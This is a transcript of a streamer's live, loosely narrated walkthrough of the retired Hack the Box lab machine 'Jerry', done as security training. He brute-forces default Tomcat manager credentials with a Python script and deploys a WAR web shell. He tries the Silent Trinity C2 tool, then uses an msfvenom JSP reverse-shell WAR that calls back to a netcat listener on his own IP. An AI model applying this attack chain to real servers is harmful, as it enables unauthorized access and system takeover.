Hello, everybody, and welcome back. Welcome back. It's me, CyberWarriorStudios, and we're on Tech Tuesday. So, a lot of big things going on. A lot of changes coming around the pipe, things of that nature. So hopefully you see some quality stuff coming down the line here shortly. Unfortunately, I haven't been able to do my Motivation Mondays, but I'm hoping to have that fixed, hopefully starting next week. But if not, trust me, here in the near future, I will get back to doing those. So, moving forward, I know Devil Ray, I was talking to him in chat. He suggested I do one Hack the Box machine, did some looking around, and decided on another. And that's because this one gets interesting and allows us to test a new tool. So, I am actually going to be using a tool called Silent Trinity for this one, and we're going to be doing the box Jerry. So hopefully you all are with me and following along and all that other fun jazz so that we can get this underway. But as always, the key to all of this is going through enumeration, learning different tools, techniques, and things like that to be able to do what we do, which is pen testing and security and just everything. So I want to make it known that when I do these things, I'm trying to keep boxes limited in what am I looking for? Limited in the ability for or limited in, trying to keep some more of the basic stuff going. Fast Bite, we're actually going to do the Hack the Box Jerry machine. That is the plan for today. So that is going to be my goal to get that done. And it's got some quirks, some new tools, which is always fun. So that's what we're going to be working on. So let me get in here and get this IP for us. So the IP that we're going to be working with today is 10.10.10.95, which is the Jerry box. It's another Windows box. But like I said, we're going to use this new Silent Trinity tool. Hopefully I can figure it out so that we can play with it. But going forward, let me get to where I want to be. All right. So we have OpenVPN, we have Silent Trinity installed, so we're going to go here. And first things first, we've got to scan this box, right? That's always the first step. So we're going to run nmap-sc-sv-oa. Whoops, let's make our directory first. Make dir Jerry. cd Jerry. Clear sudo su. All right. Map dash o. Oops. We're just gonna do dash a script and then dash oa, and we're gonna call this Jerry nmap and dash uv. We'll use the basic ports and 10. Stupid number lock. 10.10.10.95. Right. I think I'm right. Should be right. Yeah. So how's everybody doing tonight? Should be a fun night. And get through this. I don't know if it's going to take me an hour. I'm hoping not tonight. I got a lot of stuff I got to get done tomorrow. And I've been scripting all day. So we'll see how long this one takes. All right, so what do we have? Let's take a look. Scroll up. We have port 8080 running Apache Tomcat, and that looks to be the only port running. I could potentially look at all ports, but I already know that's the only port that's of any import. So, with that being the case, there's a lot of things we can look at, but let's first go to this, right? Let's go to this port. Go to this, see if there's a website here. Maybe it's default, maybe it's not. Come on. Where'd my browser go? Did you give me a browser? Web browser, where are you? I'm sorry, my computer is dragging today, so I apologize for that. I'll take a look at that. Alright, why is this not working? You know, you gotta love when problems occur on a live stream where your browsers aren't working. Come on, be a peach. Wait, there we go. Alright, it's loading. It's just running extremely slow today. Don't know why. I don't have a lot running on my computer. Let me close out of this. Close. Yeah, sure. Yeah, that's my security happy hour. I gotta do some edits on that so I can put the podcast up. Don't judge me. Don't know why this is dragging ass. So I closed out of that, got that going, Alright, you know what? Let's do something else. This one. And this one. And quit using all my content. Alright, hopefully that's a little better. I doubt it, but we'll try. Close Firefox. I don't want to close Firefox. Okay. Oh, you gotta love when computers run this slow. Always in the middle of something. So whoever's watching live, thank you for joining. Can't see who's all on, but you know. I love you all, regardless. Not like starting up 50 million browsers. No. Oh well. Whatever. Dude, what is going on? Let's close out of you. Yeah, okay, I already knew about that. It's not what we want. So you know they got me off track of what I was looking for. Oh yeah. 10, 10, 10, 95, port, 80, 80. What do we have here? Hey, default Tomcat. So, there is ways we can attempt to log into this. Now, normally, when you're enumerating and you're looking at things like that, what you would do is Tomcat 0.0.88 vulnerabilities, and we can create a default word list, or we could just do Tomcat 7.0.88 default logins. What's going on, Dip214? Let's see, do they have... Well, they got a few here. Alright. So, what did we get here? How's that? So, what I'm looking at here, they built a fun little Python script to run through this. So we're going to do the same thing. So we're going to do VI, and we're going to call this which, speaking of which, did we get anything for vulnerabilities? Oh my goodness, so slow. I apologize tonight, guys. My system is being extremely laggy for some reason. Come on. Default credentials. Alright. Security vulnerabilities. Anything? Let's see. CVEs 9.3 remote. Command line arguments. CGI servlet. Alright. So, not seeing anything. That's alright. We're going to have fun with this default credentials one. So, we're going to call this tomcatbrute.py. And we're going to say... I already know where that's at, so I'm not worried about that. Oops. Hashtag bang. User bang env Python. Import sys. Import requests. With open opt list. Where's this one located at? Let's find it. Opt c seclist ls cd passwords. What is this one? Default credentials? Yeah. And Tomcat? Yeah. So what's going on, Elkhart? It's going good. So let's do this. Whoops. Stupid computer. Man, guys, this is brutal tonight. I apologize. Oh, checklist, passwords, default credentials. All right, there we go. Passwords, default credentials, Tomcat, better default pass list.txt. And close that. I bet you I did that wrong. I'm missing something. Yep. Let's go back. As F. 4 line and F. C equals line dot strip. And oops. Dot split. All right. R equals request.get. And as always, guys, feel free to ask questions of what's going on, blah, blah, blah. Y'all know the deal. Now, we could very well do this with Hydra and put the link in there, but it's not what we're doing today. So if you have questions about the code or what it all means, please let me know, and I will gladly answer. Tomcat right now. And this is Alcart. This is Python 2 that we're creating this for, so not necessarily. Although you got to be careful with Python because sometimes, yes, it does. Regardless, they very much care about white space, especially tabs and things like that. I think that's all. Yeah. So let's give this a shot. Chmod. Tomcat. Tomcat. I thought so. Invalid syntax there. I knew I was going to run into syntax error somewhere. Nope. Alright, I bet you I know what it wants. Actually, let me see something. Oh, that's why. Son of a bitch. Alright, hopefully I don't get any other errors with this. Python 3. So, enclose that. And I think I gotta enclose, looking at this, everything. And escape. Whoa. Come on, escape. Oops, wrong thing. It's running. That's a good thing. See if it dies. There you go. There's your default credentials. Like I said, I know the answers. I've only done try hack me. I want to get on hack the box, but I'm doing so many things. Yeah, Shayna. Shayna. Hack the box, I actually have done more of. I've never done try hack me except for with Ty, with cover 6. I helped him out. Went through a few of his boxes just to validate some things, but it wasn't much. So most of what I've done has been hack the box. This is a box I haven't done, but is retired, so I know the answers. I've already looked at videos and things like that, so when I do these for you guys, I already know what the answers are so that when we run into issues, we can fix them without having to do it and beat our heads against the wall. So, cool. So we have an actual login. We can log into Tomcat. So if we go here, and we say we want to go to, what's it called? Yeah, I don't care about that. I don't care about that. What was the site? Manager HTML. That's what I wanted. Manager HTML. And we said Tomcat. C-C-R-E-T. Was that right? Yeah, it was. All right, cool. So I've done things like this before. There was a few boxes with, in a lot of the courses I've done, where you have to do custom war files, and you can exploit the web application manager by uploading and deploying war files. But like I said, because I'm using this to play with a new tool called Trinity, or Silent Trinity, that I've never used before, this is why I'm going through this box and actually going through and doing it as they did it. I wanted to take a look. But yeah, you can actually go into Metasploit and things like that, create a custom war file that will actually upload and call back to Netcat or whatever it is you're using. But that's not what we're going to do. What we're going to do is we're going to create another fun little tool. Or not tool, but fun little script. And we're going to call this one, just because I'm going to replicate what they did. BI. Make war.sh. And we're going to create this one. And again, if you have questions on what these scripts do, or what's being called, please let me know. Because like I said, this one I most definitely am taking from walkthroughs and things like that and watching previous videos. So it makes it, what do you call it? Just so I can go through and walk you guys through it better. Since it is a new tool and new capability. Oh, index.jsp rm-rf w shell rm-f w shell.war make dir w shell index.jsp and this is just a basic bash script. So escape quit mod plus x just make sure it works. We got that there. All right. Yep. All right, cool. So we're going to play with Silent Trinity. Whew. Now, Silent Trinity, I have been trying to play with a little bit before we got started. I wanted to make sure it was all here. Pip env shell. Now we're in a Silent Trinity shell within a pip environment. So then we just do st team server. I believe that's what it's called. Again, this tool is new to me, so we're giving it a shot. Python st.py. So Python st.py. You know, trying to figure this out. Python 3 ST client. All right. Oops. All right, we're in it. We're in Silent Trinity. There we go. Again, new tools, learn something new every day. So we're going to go here and browse. So we're going to find our new war. All right. Come on, open up. And we're going to say, where is it? Cyber Jerry. War? Yeah. Jerry. War. Okay. Deploy. All right. Click here. Hey, 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 hey. We have a web shell. Web shell. And like I said, this is... Has anyone used a web shell before? There's all different types. We could have created a war file from just about anything. We could have created web shells, this, that, and third. Has anybody used a web shell before? Not with this. Okay. All right. So web shells are actually really cool. Because when deployed, whether it be Tomcat, PHP, or whatever, if you can't get remote code execution or erase to give you a reverse shell, a standard reverse shell, whether it be Linux or Windows, sometimes all you can do is upload like a PHP file that'll give you a web shell or a war file in this case, or any number of things. So they allow you to interact with the machine as that service or as that user that is running on that machine. As we can see here, there's one file that's in Apache Tomcat Web Apps W Shell. So this is the directory we're in, is this C directory. Okay. Now, this is where it's going to get interesting, but because I've never played with Silent Trinity and the, what do you call it? The ability to upgrade was supposed to be in a video, and that video doesn't exist anymore, at least by the link. So we're going to have some fun. We're going to give this a shot. We're going to try it. So if I go here, actually, I need to know my IP. So ifconfig 1426. Okay, so we're going to go back here. And the first thing we're going to do is use HTTP. Oh, it doesn't like that. Help. Servers. Use HTTP. Not currently connected to team server. Alright, so. Oh, I need to do a listener. So, list. Exit. Ah. Alright, so this is where Google's going to come in handy. Like I said, never used this before. Starting Silent Trinity listener. We're all learning. Oh, here we go. Here's a walkthrough. I said new tool. So it's not Empire, it's not Cobalt Strike, lot built in. So we got the dependencies, we set it up, and they launch it. Got it. Oh, alright, so we need to start the team server. Alright, so exit OS. CD Trinity. So what if we do Python st.py and wait, how was I starting it? So client. Oh, there's one in Impacket. That's new. Alright, so we're going to give it a port too. So let's go here. We're all learning today. Team server port. We're going to say elite just because it's fun. Team.26. User CyberWarrior. Alrighty then. So port and secure. sure. Hey, we've got a server. So now sudo su cd opt c Trinity pick env shell. Oops, I don't want to maximize that. But I do want to do this, and then we want to do Python st.py client. So it didn't work. Team servers isn't there. Interesting. So, man, we all learning today. I know nothing about this, and it's not working the way they say. USS username. Trying to use Silent Trinity Fastbyte, something I've never used before. CyberWarrior at 10.10.14.26. Dang it. Alright, I broke something. It says it started, but even though it started, I can't find it. Shayna B. Oh, man. Let's kill this server. Let's see what happens if I put user here. Actually, let's take insecure away. And enter. So, it still started. Well, sorry for the delay there, Shayna. Port to listen on. Host IP address, team server password. So we did that. Alright, something's not working right. They changed some things, they did some things, and we're not getting what we need. Team servers. Connect. WSS. Username. Warrior. At 10.10.14.26. There we go. Whew. All right. So, let's try this. Well, what's here? Actually, we're here. So, let's do listeners. All right. Hey, we have liftoff. Man. All right. So now if we do team servers, list. All right, there's our listeners. All right, so we're in the right menu now. Whew. This is a fight. Use HTTP. Set. Bind IP. 4.26. Start. Alright, so we got a listener. Yay. So now that that is done, and we've got a reverse shell. So now here's the next question. How do we get this to upload and or execute? That is the question. Aw, thanks, Key. All right, so I'm gonna look something up on my other screen real quick. Upgrade web shell to silent Trinity. Just because my thing is. It's not what I wanted. So we need to drop a listener, it looks like. Oh, they did it that way. I'm trying to use it this way. Who's this? Don't need that. Oh, here's IPSec. All right. So we need to generate a payload. I found it. What's going on, Lurk? I found IPSec's video, guys. It was a different link. It was hidden, but that's okay. But now that we're here and we're good, let's see if we can find what we need. We already have that. We already have that. Oh, wait. Way too far. Yep. Oh, wait. We a little big here. All right. I thought I already did this. Did that fix? There we go. All right. Now we got the right bind IP. Whew. Use WMIC. Rate HTTP. Yeah. All right, hold up. So if we generated that, now we should be able to do this. I don't know what reverse or Windows web. Dang it. I don't know. That's Chinese. They're good at it. Let's see. So he put that in as a run command. So can I run a command? There we go. All right, now we got it. So if we go back, since it didn't show us how to do this, we're going to do C, Windows, System 32, WBEM, WMIC.exe, OS, get, format, HTTPS, nope, I'm on port 80. I like my RX 580, man. For the money, you couldn't beat it. 6 WMIC.xsl. I think that's right. Or no, wait. What did we call? What's ours called? Stager.xsl. Whoops. Make sure we're right. Hey. Those are karma for helping a friend build a miner last year. Man, I wanted to build a miner. I haven't done it yet. Cost too much money. Alright, so he did. Oh, I see what he did. Alright, so let's pause. Let's see. C Jerry, sudo su, move /op / Trinity. Here. Python 3-m http.server 80. Ah, crap. Hey, if he wants to send some Bitcoin my way, I won't be mad at it. I'll give you a wallet to send it to. I'm just saying. Look, I just need 2 Bitcoin or 1. That's all. Alright, so we're serving that up. And we're going to go through port 8080 here. And we're going to launch. See what happens. So, if I'm right, we get that. We go here. Did I mess something up? I'm not getting anything. Yo, don't do RM-RF star. That's bad. Hey, what's going on, Devil Ray? Hey, this one's more interesting than the other one. I'm just saying. Oh, I bet you I know why. Peppy NV. 10, 14, 26 after 20 seconds. So, I bet you if I do... Alright, we're gonna have to redo this. I bet. I wonder if it's broken. Did they break it? They were supposed to update it. That's why I didn't change anything. Because I'm not getting anything here. So let's kill that. Listeners. Oh, dang it. I killed it. That's why. Oh, man. All right. Time to do this. Sudo su. Where is it I'm looking for? There we go. It's dead. And this one, enter, clear. All right, so we're gonna try this again. All right, now we're gonna do this. And then where's that other connect we saw? It was client. Oh yeah, team servers. List. Wait. Connect. Where are we at? Where's that connect? Oh, it didn't work. Man, I'm like dying over here, guys. This is not working out the way I was hoping. So we may have to bypass Silent Trinity just to make this work right. Alright, I'll have to play with Silent Trinity later. But, in the meantime, let's do this. Where's the other one I was looking at? Really wanted this to work. This is aggravating. I'll have to play with Silent Trinity, guys, to get this to work. I only got like 9 minutes left that I didn't even want to be on this late, but now I have to finish it because, well, that's how I am. So we're just going to create a new war file and upload it. So we're going to use MSF Venom for this. MSF Venom -p Java JSP reverse shell reverse TCP lhost equals 10.10.14.26 port equals 22 for shits and giggles -f4 reverse.war. Alright, so while that's creating, we're going to exit this. Oops. Clear, exit, clear, Jerry, clear, nc-lvnp 22. Come on, finish creating. Is who moving soon, Elk? Are you just trying to kill somebody with those commands? Someone's gonna crash your system. I knew who it was. And yeah, we're trying to close April 1st, man. Hopefully. I'm just waiting for some things to come in this week to clean up, like the appraisal and shit. Thanks, brother. Come on, finish creating this damn file. I don't need you no more. Close out of you. Don't need you no more. Don't be pulling that shit. I will whoop your ass. Alright, don't need that no more. So we've got Netcat listening on port 22. Alright, so that's an invalid payload. MSF Venom-P list. No. Let's see. MSF Venom war payloads. Here we go. JSP reverse TCP. Alright, so let's try that. Did I type that in wrong? Is that what I did? Yeah, I did. Unless there's another one. Oh, once again, we're on infinite logins. That dude has come up with some mean fucking cheat sheets. I love it. JSP shell reverse TCP. That's what we want. Java, JSP, shell, return. Yeah. Let's try that. Hey, we got it. Cool. So now we go back to here. Here. And we're going to upload a new one. Browse. Where's reverse? And did I give it the right L port? Yeah, I did. All right, cool. And deploy. And reverse. And we come here. Yeah, you go bye-bye. I'll figure you out later. Come on, load. Dang it. F22 is open. Come on. Why didn't it work? You're gonna make me use a different port. Yes, you are. Alright. Let's do 8080. Go back to here. I ain't gonna have time, man. I gotta get to bed. I got work in the AM. Did I start up Netcat? Yeah, I did. There we go. Now we got a shell. Just needed a different port. And this is the problem with people setting up Tomcat in this way. As you guys can see, I am already system just by getting a reverse shell. So, yes, all that stuff with Silent Trinity wasn't really necessary. I do want to get back into it, and I may do a video in the future on what the fixes were, or at least let you know. But yeah, other than that, MSF Venom creating the reverse shell for a war file worked like a charm. So, simple netcat reverse shell. I wasn't using a staged payload or interpreter or anything like that, just a callback. So, any questions before I go? It's 9:58 my time. I'm about to roll, but I wanted to make sure you guys understood everything that went on tonight. Any questions, comments, concerns? All right. So if there's nothing else, hey guys, go ahead. If you haven't done so, go ahead and follow, subscribe, whatever you're on, doesn't matter. Go ahead and if you're on YouTube or if you're following me on Twitter, whatever the case may be, I do have a Buy Me a Coffee, buymeacoffee.com/CyberWarrior or Patreon. Please become a patron, and patreon.com/CyberWarriorStudios. Other than that, it's been great having you guys here. It's always a pleasure having you guys online. And I hope to catch you all this Friday for Security Happy Hour, where I will have 2 new guests and have quite a few lined up for the next few weeks. So, saying that, I love you all. Have a fantastic evening and a great week. And I will catch you all next time.